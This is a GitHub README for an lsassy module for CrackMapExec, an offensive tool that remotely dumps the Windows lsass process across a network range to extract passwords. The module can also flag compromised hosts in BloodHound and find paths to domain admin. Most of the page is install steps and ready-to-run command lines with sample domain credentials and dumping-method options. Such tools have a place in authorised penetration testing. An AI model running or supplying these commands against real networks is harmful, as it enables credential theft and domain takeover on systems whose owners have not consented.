Skip to content
Branch: master
Find file History
Latest commit 560bec6 Jan 18, 2020
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md Update README.md Jan 10, 2020
lsassy.py Remove method 5 forced Jan 18, 2020
requirements.txt Add CME module in repository Dec 4, 2019

README.md

lsassy CrackMapExec Module

CrackMapExec >= 4.0.1

This CME module uses lsassy to remotely extract lsass password, and optionally interacts with Bloodhound to set compromised hosts as owned and check if compromised users have a path to domain admin.

CME Module example

Requirements

Installation

  • Install lsassy
  • Download lsassy CrackMapExec module
  • Copy lsassy.py in [CrackMapExec Path]/cme/modules
  • Reinstall CrackMapExec using python2.7 python setup.py install
python3 -m pip install lsassy
wget https://raw.githubusercontent.com/Hackndo/lsassy/master/cme/lsassy.py
cp lsassy.py /opt/CrackMapExec/cme/modules/
cd /opt/CrackMapExec
python setup.py install

Usage

Basic

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy

Advanced

By default, this module uses rundll32.exe with comsvcs.dll DLL to dump lsass process on the remote host, with method 1 of lsassy.

If you want to specify the dumping method, use the METHOD option (lsassy -h for more details)

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o METHOD=3

If you're using a method that requires procdump, you can specify procdump location with PROCDUMP_PATH option.

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o METHOD=2 PROCDUMP_PATH=/opt/Sysinternals/procdump.exe

By default, lsass dump name is randomly generated. If you want to specify a dump name, you can use REMOTE_LSASS_DUMP option.

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o REMOTE_LSASS_DUMP=LSASSY_DUMP.dmp

BloodHound

You can set BloodHound integration using -o BLOODHOUND=True flag. This flag enables different checks :

  • Set "owned" on BloodHound computer nodes that are compromised
  • Detect compromised users that have a path to domain admin
cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o BLOODHOUND=True

You can check available options using

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy --options
[*] lsassy module options:

            METHOD              Method to use to dump procdump with lsassy. See lsassy -h for more details
            REMOTE_LSASS_DUMP   Name of the remote lsass dump (default: Random)
            PROCDUMP_PATH       Path to procdump on attacker host. If this is not set, "rundll32" method is used
            BLOODHOUND          Enable Bloodhound integration (default: false)
            NEO4JURI            URI for Neo4j database (default: 127.0.0.1)
            NEO4JPORT           Listeninfg port for Neo4j database (default: 7687)
            NEO4JUSER           Username for Neo4j database (default: 'neo4j')
            NEO4JPASS           Password for Neo4j database (default: 'neo4j')
            WITHOUT_EDGES       List of black listed edges (example: 'SQLAdmin,CanRDP', default: '')

Issue

If you find an issue with this tool (that's very plausible !), please

  • Check that you're using the latest version
  • Send as much details as possible.
    • For standalone lsassy, please use the -d debug flag
    • For CME module, please use CrackMapExec --verbose flag

Have fun

You can’t perform that action at this time.